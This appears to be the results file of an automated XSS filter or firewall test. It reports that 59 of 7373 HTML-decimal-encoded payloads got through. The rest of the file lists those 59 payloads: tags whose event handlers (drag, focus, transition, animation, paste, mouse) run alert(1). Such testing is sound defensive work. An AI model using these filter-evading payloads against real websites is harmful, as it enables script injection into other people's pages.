================================================================================
File: html_decimal.txt - Summary
================================================================================
Total Tested: 7373
Bypassed: 59
Blocked: 7314
Bypass Rate: 0.80%
================================================================================

BYPASSED PAYLOADS:
--------------------------------------------------------------------------------

&#34;&#60;&#109;&#97;&#114;&#107;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#108;&#101;&#97;&#118;&#101;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#109;&#97;&#114;&#107;&#62;&#34;
&#60;&#102;&#114;&#97;&#109;&#101;&#115;&#101;&#116;&#32;&#111;&#110;&#112;&#111;&#105;&#110;&#116;&#101;&#114;&#117;&#112;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#88;&#83;&#83;&#60;&#47;&#102;&#114;&#97;&#109;&#101;&#115;&#101;&#116;&#62;
&#60;&#115;&#117;&#112;&#32;&#105;&#100;&#61;&#120;&#32;&#116;&#97;&#98;&#105;&#110;&#100;&#101;&#120;&#61;&#49;&#32;&#111;&#110;&#102;&#111;&#99;&#117;&#115;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#60;&#47;&#115;&#117;&#112;&#62;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#62;&#58;&#116;&#97;&#114;&#103;&#101;&#116;&#32;&#123;&#99;&#111;&#108;&#111;&#114;&#58;&#32;&#114;&#101;&#100;&#59;&#125;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#60;&#107;&#98;&#100;&#32;&#105;&#100;&#61;&#120;&#32;&#115;&#116;&#121;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#97;&#110;&#115;&#105;&#116;&#105;&#111;&#110;&#58;&#99;&#111;&#108;&#111;&#114;&#32;&#49;&#48;&#115;&#34;&#34;&#32;&#111;&#110;&#116;&#114;&#97;&#110;&#115;&#105;&#116;&#105;&#111;&#110;&#99;&#97;&#110;&#99;&#101;&#108;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#60;&#47;&#107;&#98;&#100;&#62;&#34;
&#34;&#60;&#101;&#109;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#111;&#117;&#116;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#101;&#109;&#62;&#34;
&#34;&#60;&#112;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#109;&#111;&#118;&#101;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#112;&#62;&#34;
&#34;&#60;&#109;&#97;&#114;&#107;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#115;&#116;&#97;&#114;&#116;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#109;&#97;&#114;&#107;&#62;&#34;
&#34;&#60;&#116;&#116;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#108;&#101;&#97;&#118;&#101;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#116;&#116;&#62;&#34;
&#34;&#60;&#109;&#97;&#112;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#109;&#111;&#118;&#101;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#109;&#97;&#112;&#62;&#34;
&#60;&#115;&#116;&#114;&#105;&#107;&#101;&#32;&#105;&#100;&#61;&#120;&#32;&#116;&#97;&#98;&#105;&#110;&#100;&#101;&#120;&#61;&#49;&#32;&#111;&#110;&#102;&#111;&#99;&#117;&#115;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#60;&#47;&#115;&#116;&#114;&#105;&#107;&#101;&#62;
&#34;&#60;&#104;&#101;&#97;&#100;&#32;&#111;&#110;&#112;&#97;&#115;&#116;&#101;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#32;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#101;&#100;&#105;&#116;&#97;&#98;&#108;&#101;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#104;&#101;&#97;&#100;&#62;&#34;
&#34;&#60;&#115;&#109;&#97;&#108;&#108;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#108;&#101;&#97;&#118;&#101;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#115;&#109;&#97;&#108;&#108;&#62;&#34;
&#34;&#60;&#109;&#117;&#108;&#116;&#105;&#99;&#111;&#108;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#111;&#117;&#116;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#109;&#117;&#108;&#116;&#105;&#99;&#111;&#108;&#62;&#34;
&#34;&#60;&#100;&#105;&#118;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#101;&#100;&#105;&#116;&#97;&#98;&#108;&#101;&#62;&#100;&#114;&#97;&#103;&#32;&#109;&#101;&#60;&#47;&#100;&#105;&#118;&#62;&#60;&#99;&#111;&#108;&#103;&#114;&#111;&#117;&#112;&#32;&#111;&#110;&#100;&#114;&#111;&#112;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#32;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#101;&#100;&#105;&#116;&#97;&#98;&#108;&#101;&#62;&#100;&#114;&#111;&#112;&#32;&#104;&#101;&#114;&#101;&#60;&#47;&#99;&#111;&#108;&#103;&#114;&#111;&#117;&#112;&#62;&#34;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#62;&#58;&#116;&#97;&#114;&#103;&#101;&#116;&#32;&#123;&#99;&#111;&#108;&#111;&#114;&#58;&#32;&#114;&#101;&#100;&#59;&#125;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#60;&#102;&#114;&#97;&#109;&#101;&#32;&#105;&#100;&#61;&#120;&#32;&#115;&#116;&#121;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#97;&#110;&#115;&#105;&#116;&#105;&#111;&#110;&#58;&#99;&#111;&#108;&#111;&#114;&#32;&#49;&#48;&#115;&#34;&#34;&#32;&#111;&#110;&#116;&#114;&#97;&#110;&#115;&#105;&#116;&#105;&#111;&#110;&#99;&#97;&#110;&#99;&#101;&#108;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#60;&#47;&#102;&#114;&#97;&#109;&#101;&#62;&#34;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#101;&#110;&#116;&#101;&#114;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#34;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#62;&#58;&#116;&#97;&#114;&#103;&#101;&#116;&#32;&#123;&#116;&#114;&#97;&#110;&#115;&#102;&#111;&#114;&#109;&#58;&#32;&#114;&#111;&#116;&#97;&#116;&#101;&#40;&#49;&#56;&#48;&#100;&#101;&#103;&#41;&#59;&#125;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#60;&#114;&#98;&#32;&#105;&#100;&#61;&#120;&#32;&#115;&#116;&#121;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#97;&#110;&#115;&#105;&#116;&#105;&#111;&#110;&#58;&#116;&#114;&#97;&#110;&#115;&#102;&#111;&#114;&#109;&#32;&#50;&#115;&#34;&#34;&#32;&#111;&#110;&#116;&#114;&#97;&#110;&#115;&#105;&#116;&#105;&#111;&#110;&#114;&#117;&#110;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#60;&#47;&#114;&#98;&#62;&#34;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#101;&#110;&#116;&#101;&#114;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#34;
&#34;&#60;&#112;&#114;&#111;&#103;&#114;&#101;&#115;&#115;&#32;&#111;&#110;&#107;&#101;&#121;&#100;&#111;&#119;&#110;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#32;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#101;&#100;&#105;&#116;&#97;&#98;&#108;&#101;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#112;&#114;&#111;&#103;&#114;&#101;&#115;&#115;&#62;&#34;
&#34;&#60;&#100;&#105;&#118;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#101;&#110;&#116;&#101;&#114;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#100;&#105;&#118;&#62;&#34;
&#34;&#60;&#115;&#117;&#109;&#109;&#97;&#114;&#121;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#111;&#117;&#116;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#115;&#117;&#109;&#109;&#97;&#114;&#121;&#62;&#34;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#62;&#64;&#107;&#101;&#121;&#102;&#114;&#97;&#109;&#101;&#115;&#32;&#120;&#123;&#125;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#60;&#102;&#111;&#110;&#116;&#32;&#115;&#116;&#121;&#108;&#101;&#61;&#34;&#34;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#45;&#110;&#97;&#109;&#101;&#58;&#120;&#34;&#34;&#32;&#111;&#110;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#115;&#116;&#97;&#114;&#116;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#60;&#47;&#102;&#111;&#110;&#116;&#62;&#34;
&#34;&#60;&#102;&#114;&#97;&#109;&#101;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#111;&#117;&#116;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#102;&#114;&#97;&#109;&#101;&#62;&#34;
&#34;&#60;&#99;&#111;&#100;&#101;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#101;&#110;&#116;&#101;&#114;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#99;&#111;&#100;&#101;&#62;&#34;
&#34;&#60;&#109;&#97;&#112;&#32;&#111;&#110;&#98;&#101;&#102;&#111;&#114;&#101;&#99;&#117;&#116;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#32;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#101;&#100;&#105;&#116;&#97;&#98;&#108;&#101;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#109;&#97;&#112;&#62;&#34;
&#34;&#60;&#117;&#108;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#101;&#110;&#116;&#101;&#114;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#117;&#108;&#62;&#34;
&#34;&#60;&#102;&#111;&#111;&#116;&#101;&#114;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#115;&#116;&#97;&#114;&#116;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#102;&#111;&#111;&#116;&#101;&#114;&#62;&#34;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#62;&#64;&#107;&#101;&#121;&#102;&#114;&#97;&#109;&#101;&#115;&#32;&#120;&#123;&#125;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#60;&#119;&#98;&#114;&#32;&#115;&#116;&#121;&#108;&#101;&#61;&#34;&#34;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#45;&#110;&#97;&#109;&#101;&#58;&#120;&#34;&#34;&#32;&#111;&#110;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#101;&#110;&#100;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#60;&#47;&#119;&#98;&#114;&#62;&#34;
&#34;&#60;&#115;&#109;&#97;&#108;&#108;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#108;&#101;&#97;&#118;&#101;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#115;&#109;&#97;&#108;&#108;&#62;&#34;
&#34;&#60;&#115;&#101;&#99;&#116;&#105;&#111;&#110;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#115;&#116;&#97;&#114;&#116;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#115;&#101;&#99;&#116;&#105;&#111;&#110;&#62;&#34;
&#34;&#60;&#120;&#109;&#112;&#32;&#111;&#110;&#107;&#101;&#121;&#100;&#111;&#119;&#110;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#32;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#101;&#100;&#105;&#116;&#97;&#98;&#108;&#101;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#120;&#109;&#112;&#62;&#34;
&#34;&#60;&#115;&#117;&#98;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#101;&#110;&#116;&#101;&#114;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#115;&#117;&#98;&#62;&#34;
&#60;&#109;&#101;&#116;&#101;&#114;&#32;&#105;&#100;&#61;&#120;&#32;&#116;&#97;&#98;&#105;&#110;&#100;&#101;&#120;&#61;&#49;&#32;&#111;&#110;&#98;&#101;&#102;&#111;&#114;&#101;&#97;&#99;&#116;&#105;&#118;&#97;&#116;&#101;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#60;&#47;&#109;&#101;&#116;&#101;&#114;&#62;
&#34;&#60;&#112;&#105;&#99;&#116;&#117;&#114;&#101;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#100;&#111;&#119;&#110;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#112;&#105;&#99;&#116;&#117;&#114;&#101;&#62;&#34;
&#34;&#60;&#100;&#116;&#32;&#111;&#110;&#99;&#111;&#112;&#121;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#32;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#101;&#100;&#105;&#116;&#97;&#98;&#108;&#101;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#100;&#116;&#62;&#34;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#62;&#58;&#116;&#97;&#114;&#103;&#101;&#116;&#32;&#123;&#116;&#114;&#97;&#110;&#115;&#102;&#111;&#114;&#109;&#58;&#32;&#114;&#111;&#116;&#97;&#116;&#101;&#40;&#49;&#56;&#48;&#100;&#101;&#103;&#41;&#59;&#125;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#60;&#98;&#105;&#103;&#32;&#105;&#100;&#61;&#120;&#32;&#115;&#116;&#121;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#97;&#110;&#115;&#105;&#116;&#105;&#111;&#110;&#58;&#116;&#114;&#97;&#110;&#115;&#102;&#111;&#114;&#109;&#32;&#50;&#115;&#34;&#34;&#32;&#111;&#110;&#116;&#114;&#97;&#110;&#115;&#105;&#116;&#105;&#111;&#110;&#114;&#117;&#110;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#60;&#47;&#98;&#105;&#103;&#62;&#34;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#62;&#58;&#116;&#97;&#114;&#103;&#101;&#116;&#32;&#123;&#99;&#111;&#108;&#111;&#114;&#58;&#32;&#114;&#101;&#100;&#59;&#125;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#60;&#100;&#97;&#116;&#97;&#108;&#105;&#115;&#116;&#32;&#105;&#100;&#61;&#120;&#32;&#115;&#116;&#121;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#97;&#110;&#115;&#105;&#116;&#105;&#111;&#110;&#58;&#99;&#111;&#108;&#111;&#114;&#32;&#49;&#48;&#115;&#34;&#34;&#32;&#111;&#110;&#116;&#114;&#97;&#110;&#115;&#105;&#116;&#105;&#111;&#110;&#99;&#97;&#110;&#99;&#101;&#108;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#60;&#47;&#100;&#97;&#116;&#97;&#108;&#105;&#115;&#116;&#62;&#34;
&#34;&#60;&#116;&#97;&#98;&#108;&#101;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#117;&#112;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#116;&#97;&#98;&#108;&#101;&#62;&#34;
&#34;&#60;&#101;&#109;&#98;&#101;&#100;&#32;&#111;&#110;&#98;&#101;&#102;&#111;&#114;&#101;&#99;&#111;&#112;&#121;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#32;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#101;&#100;&#105;&#116;&#97;&#98;&#108;&#101;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#101;&#109;&#98;&#101;&#100;&#62;&#34;
&#34;&#60;&#107;&#101;&#121;&#103;&#101;&#110;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#107;&#101;&#121;&#103;&#101;&#110;&#62;&#34;
&#34;&#60;&#105;&#109;&#103;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#109;&#111;&#118;&#101;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#105;&#109;&#103;&#62;&#34;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#62;&#64;&#107;&#101;&#121;&#102;&#114;&#97;&#109;&#101;&#115;&#32;&#120;&#123;&#125;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#60;&#115;&#117;&#112;&#32;&#115;&#116;&#121;&#108;&#101;&#61;&#34;&#34;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#45;&#110;&#97;&#109;&#101;&#58;&#120;&#34;&#34;&#32;&#111;&#110;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#115;&#116;&#97;&#114;&#116;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#60;&#47;&#115;&#117;&#112;&#62;&#34;
&#34;&#60;&#108;&#105;&#115;&#116;&#105;&#110;&#103;&#32;&#111;&#110;&#100;&#98;&#108;&#99;&#108;&#105;&#99;&#107;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#108;&#105;&#115;&#116;&#105;&#110;&#103;&#62;&#34;
&#34;&#60;&#60;&#83;&#67;&#82;&#73;&#80;&#84;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#34;&#34;&#34;&#41;&#59;&#47;&#47;&#92;&#60;&#60;&#47;&#83;&#67;&#82;&#73;&#80;&#84;&#62;&#34;
&#34;&#60;&#107;&#101;&#121;&#103;&#101;&#110;&#32;&#111;&#110;&#99;&#111;&#110;&#116;&#101;&#120;&#116;&#109;&#101;&#110;&#117;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#107;&#101;&#121;&#103;&#101;&#110;&#62;&#34;
&#34;&#60;&#117;&#32;&#111;&#110;&#98;&#101;&#102;&#111;&#114;&#101;&#99;&#111;&#112;&#121;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#32;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#101;&#100;&#105;&#116;&#97;&#98;&#108;&#101;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#117;&#62;&#34;
&#34;&#60;&#112;&#114;&#111;&#103;&#114;&#101;&#115;&#115;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#101;&#110;&#100;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#112;&#114;&#111;&#103;&#114;&#101;&#115;&#115;&#62;&#34;
&#34;&#60;&#115;&#97;&#109;&#112;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#115;&#97;&#109;&#112;&#62;&#34;
&#34;&#60;&#98;&#111;&#100;&#121;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#111;&#117;&#116;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#98;&#111;&#100;&#121;&#62;&#34;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#62;&#64;&#107;&#101;&#121;&#102;&#114;&#97;&#109;&#101;&#115;&#32;&#115;&#108;&#105;&#100;&#101;&#105;&#110;&#32;&#123;&#125;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#60;&#109;&#97;&#114;&#113;&#117;&#101;&#101;&#32;&#115;&#116;&#121;&#108;&#101;&#61;&#34;&#34;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#45;&#100;&#117;&#114;&#97;&#116;&#105;&#111;&#110;&#58;&#49;&#115;&#59;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#45;&#110;&#97;&#109;&#101;&#58;&#115;&#108;&#105;&#100;&#101;&#105;&#110;&#59;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#45;&#105;&#116;&#101;&#114;&#97;&#116;&#105;&#111;&#110;&#45;&#99;&#111;&#117;&#110;&#116;&#58;&#50;&#34;&#34;&#32;&#111;&#110;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#105;&#116;&#101;&#114;&#97;&#116;&#105;&#111;&#110;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#60;&#47;&#109;&#97;&#114;&#113;&#117;&#101;&#101;&#62;&#34;
&#34;&#60;&#115;&#116;&#121;&#108;&#101;&#62;&#64;&#107;&#101;&#121;&#102;&#114;&#97;&#109;&#101;&#115;&#32;&#120;&#123;&#125;&#60;&#47;&#115;&#116;&#121;&#108;&#101;&#62;&#60;&#104;&#114;&#32;&#115;&#116;&#121;&#108;&#101;&#61;&#34;&#34;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#45;&#110;&#97;&#109;&#101;&#58;&#120;&#34;&#34;&#32;&#111;&#110;&#97;&#110;&#105;&#109;&#97;&#116;&#105;&#111;&#110;&#101;&#110;&#100;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#60;&#47;&#104;&#114;&#62;&#34;
&#34;&#60;&#109;&#97;&#114;&#107;&#32;&#111;&#110;&#112;&#97;&#115;&#116;&#101;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#32;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#101;&#100;&#105;&#116;&#97;&#98;&#108;&#101;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#109;&#97;&#114;&#107;&#62;&#34;
&#60;&#108;&#105;&#32;&#111;&#110;&#112;&#111;&#105;&#110;&#116;&#101;&#114;&#109;&#111;&#118;&#101;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#88;&#83;&#83;&#60;&#47;&#108;&#105;&#62;
&#60;&#105;&#110;&#115;&#32;&#111;&#110;&#112;&#111;&#105;&#110;&#116;&#101;&#114;&#111;&#118;&#101;&#114;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#88;&#83;&#83;&#60;&#47;&#105;&#110;&#115;&#62;
&#34;&#60;&#115;&#109;&#97;&#108;&#108;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#117;&#112;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#115;&#109;&#97;&#108;&#108;&#62;&#34;
&#34;&#60;&#115;&#101;&#108;&#101;&#99;&#116;&#32;&#111;&#110;&#99;&#111;&#112;&#121;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#32;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#101;&#100;&#105;&#116;&#97;&#98;&#108;&#101;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#115;&#101;&#108;&#101;&#99;&#116;&#62;&#34;
&#34;&#60;&#105;&#109;&#103;&#32;&#100;&#114;&#97;&#103;&#103;&#97;&#98;&#108;&#101;&#61;&#34;&#34;&#116;&#114;&#117;&#101;&#34;&#34;&#32;&#111;&#110;&#100;&#114;&#97;&#103;&#101;&#110;&#100;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#105;&#109;&#103;&#62;&#34;
